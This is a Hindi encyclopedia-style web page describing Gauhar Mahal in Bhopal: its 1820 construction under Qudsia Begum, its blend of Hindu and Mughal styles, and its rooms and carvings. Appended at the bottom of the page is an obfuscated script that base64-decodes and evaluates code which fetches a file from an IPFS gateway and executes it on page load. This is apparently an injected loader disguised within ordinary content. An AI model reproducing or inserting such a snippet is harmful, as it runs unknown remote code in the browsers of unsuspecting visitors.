गौहर महल भोपाल

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
गौहर महल, भोपाल

गौहर महल मध्य प्रदेश के भोपाल शहर के बड़े तालाब के किनारे व्ही.आई.पी. रोड पर शौकत महल के पास बड़ी झील के किनारे स्थित है।

  • यह वास्तुकला का ख़ूबसूरत नमूना कुदसिया बेगम के काल का है।
  • इस तिमंजिले भवन का निर्माण भोपाल राज्य की तत्कालीन शासिका नवाब कुदसिया बेगम (सन् 1819-37) ने गौहर महल को 1820 ई. में कराया था।
  • गौहर महल 4.65 एकड़ क्षेत्र में फैले है।
  • कुदसिया बेगम का नाम गौहर भी था इसलिए इस महल को गौहर महल के नाम से जाना जाता है।
  • यह महल भोपाल रियासत का पहला महल है।
  • इस महल की ख़ासिय यह है कि इसकी सजावट भारतीय और इस्लामिक वास्तुकला को मिलाकर की गई है।
  • यह महल हिन्‍दु और मुग़ल कला का अद्भुत संगम है।
  • इस महल में दीवान-ए आम और दीवान-ए-ख़ास हैं।
  • गौहर महल के आंतरिक भाग में नयनाभिराम फब्बारे थे जो कालान्तर में नष्ट हो गये हैं। फब्बारों की हौज अब भी विद्यमान है।
  • हल के ऊपर का हिस्सा में एक ऐसा कमरा है जिससे पूरे शहर का नजारा दिखाता है और इसके दरवाजों पर कांच से नक़्क़ाशी की गई है।
  • गौहर महल की दीवारों पर लकड़ी के नक़्क़ाशीदार स्तंभ, वितान और मेहराबें हैं। स्तंभों पर आकृतियां और फूल पत्तियों का अंकन है।
  • आंतरिक हिस्स में बेगम का निवास था जिसकी खिड़कियों से बड़े तालाब का मनोरम दृश्य दिखाई देता है।
  • भवन की दूसरी मंज़िल पर एक प्रसूतिगृह था, जिसकी दीवारों पर रंगीन चित्र बने थे।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>